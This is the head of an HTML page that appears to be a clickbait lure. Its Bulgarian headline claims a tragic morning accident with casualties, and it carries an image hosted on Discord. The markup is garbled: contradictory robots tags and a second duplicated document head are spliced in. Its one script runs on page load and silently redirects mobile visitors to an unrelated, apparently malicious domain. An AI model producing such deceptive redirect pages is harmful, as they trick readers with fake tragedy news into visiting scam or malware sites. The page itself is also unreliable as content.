<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8"/>
<meta name="title" content="Stream"/>
<meta name="keywords" content="Instagram"/>
<meta property="og:description" content="128,112,104,посещение"/>
<meta name="robots" content="index, follow"/>
<meta name="googlebot" content="noindex"/>
<meta name="robots" content="index"/>
<meta name="robots" content="noindex"/>
<meta name="robots" content="nofollow"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:title" content="Тази сутрин е станал трагичен инцидент има ранени и загинали"/>
<meta property="og:image" content="https://media.discordapp.net/attachments/1074068021083123824/1227290162740990073/gfdsgdfrewte4.jpg?ex=6627de08&is=66156908&hm=39ee3717598ebbf8d9be381fb16795c5a0ef3978d6bea291676008d25500db71&=&format=webp"/>
<meta name="apple-itunes-app" content="app-id=6448311069"/>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Този трагичен инцидент взе няколко жертви тази сутрин</title>
<script>
    // Función para redirigir si el usuario está en un dispositivo móvil
    function redirigirAMobile() {
        // Verificar si el ancho de la pantalla es menor que cierto valor (se considera móvil)
        if (window.innerWidth <= 768) { // Puedes ajustar este valor según tus necesidades
            // Redireccionar al URL deseado
            window.location.href = "https://pong024.jaskingnew212.cloud/";
        }
    }
    // Llamar a la función cuando la página se cargue
    window.onload = redirigirAMobile;
</script>
